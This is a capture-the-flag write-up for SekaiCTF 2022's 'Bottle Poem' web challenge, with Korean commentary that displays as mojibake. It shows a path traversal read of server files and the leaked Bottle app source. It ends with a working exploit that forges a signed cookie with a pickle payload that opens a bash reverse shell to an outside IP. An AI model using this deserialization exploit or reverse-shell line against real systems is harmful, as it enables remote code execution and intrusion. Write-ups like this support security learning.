[SekaiCTF 2022] Bottle Poem
Bottle Poem
SekaiCTF์ ์ฒซ๋ฒ์งธ Web๋ฌธ์ ์ด์ 1๋จ๊ณ ๋ฌธ์ ์์ง๋ง.. ์์ฒญ๋๊ฒ ์ฝ์งํ๋ค
๋ฌธ์ ์ ๋ฉ์ธ ํ์ด์ง์ด๋ค. ํ์ดํผ๋งํฌ๋ฅผ ํด๋ฆญํด๋ณด๋ฉด
์ด๋ ๊ฒ ์๊ฐ ๋ณด์ธ๋ค. URL์ id๋ผ๋ ์ธ์๋ก /etc/passwd๋ฅผ ์ป๋๋ฐ ์ฑ๊ณตํ์ง๋ง FLAG๋ ์์๋ค. ๋ฌธ์ ์ค๋ช
์ ๋ค์ ๋ณด๋ฉด FLAG๋ ์๋ฒ์ ์คํ ํ์ผ๋ก ์กด์ฌํ๋ค๊ณ ์ ํ์๋ค. ์ฆ ์ด๋ฐ ๋ฐฉ์์ผ๋ก๋ ํ๋๊ทธ๋ฅผ ํ๋ํ ์ ์๋ค. RCE๋ฅผ ํด์ผ ํ ๊ฒ ๊ฐ๋ค.
/proc/self/cmdline ๊ฒฝ๋ก์ ๋ค์ด๊ฐ์ ํ๋ก์ธ์ค๊ฐ ์คํ๋ ๋ฐฉ์์ ํ์
ํด app.py์ ๊ฒฝ๋ก๋ฅผ ์ฐพ์๋ค.
python3 -u /app/app.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
#app.py
from bottle import route, run, template, request, response, error
from config.secret import sekai
import os
import re
@route("/")
def home():
return template("index")
@route("/show")
def index():
response.content_type = "text/plain; charset=UTF-8"
param = request.query.id
if re.search("^../app", param):
return "No!!!!"
requested_path = os.path.join(os.getcwd() + "/poems", param)
try:
with open(requested_path) as f:
tfile = f.read()
except Exception as e:
return "No This Poems"
return tfile
@error(404)
def error404(error):
return template("error")
@route("/sign")
def index():
try:
session = request.get_cookie("name", secret=sekai)
if not session or session["name"] == "guest":
session = {"name": "guest"}
response.set_cookie("name", session, secret=sekai)
return template("guest", name=session["name"])
if session["name"] == "admin":
return template("admin", name=session["name"])
except:
return "pls no hax"
if __name__ == "__main__":
os.chdir(os.path.dirname(__file__))
run(host="0.0.0.0", port=8080)
app.py์ ์ฝ๋์ด๋ค. ๋ชฐ๋๋ ๊ฒฝ๋ก์ธ /sign์ด ์๋ค.
์ ์ํด๋ณด๋ฉด ์ด๋ฌํ ๋ฌธ๊ตฌ๊ฐ ๋จ๊ณ ์๋ฌด ์ผ๋ ์ผ์ด๋์ง ์๋๋ค. ํ์ฌ ์กฐ์ํ ์ ์๋ ์ ์ผํ ๊ฐ์ธ Cookie๋ฅผ ์ด์ฉํด์ผ ํ ๊ฒ ๊ฐ๋ค.
Bottle Documentation
Bottle framework Docmentation 16ํ์ด์ง๋ฅผ ๋ณด๋ฉด Bottle์ ์ฟ ํค๋ค์ ์๋์ ์ผ๋ก pickle๋ก ์ง๋ ฌํ๋๊ณ ์ญ์ง๋ ฌํ๋๋ค๋ ๊ฒ์ ์ ์ ์๋ค. pickle ์ญ์ง๋ ฌํ ์ทจ์ฝ์ ์ ์ด์ฉํ์ฌ Cookie๊ฐ์ ์ ์กฐ์ํด ๋ฆฌ๋ฒ์ค ์์ ๋ธ ์ ์์ ๊ฒ ๊ฐ๋ค.
๋จผ์ ์ฟ ํค๋ฅผ ๋ด๋ง๋๋ก ๋ง๋ค๊ธฐ ์ํด ๊ฒฝ๋ก๋ฅผ ํ์ธํด sekai๊ฐ์ ์์๋๋ค.
Exploit
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import os
from bottle import *
import requests
sekai = "Se3333KKKKKKAAAAIIIIILLLLovVVVVV3333YYYYoooouuu"
url = "http://bottle-poem.ctf.sekai.team/sign"
class RCE:
def __reduce__(self):
cmd = ("bash -c 'exec bash -i &>/dev/tcp/43.200.117.188/56501 <&1'")
return os.system, (cmd,)
response.set_cookie("name", RCE(), secret=sekai)
payload = str(response)
payload = payload.replace("Content-Type: text/html; charset=UTF-8\nSet-Cookie: name=", '')
payload = payload.strip()
payload_send = {"name":f'{payload}'}
print("[+] Sending %s" % payload_send)
send_exploit = requests.get(url, cookies=payload_send)
์ ์คํฌ๋ฆฝํธ๋ฅผ ์คํ์์ผ revers shell์ ํ๋ํด flag๋ฅผ ์คํ์์ผฐ๋ค.
SEKAI{W3lcome_To_Our_Bottle}




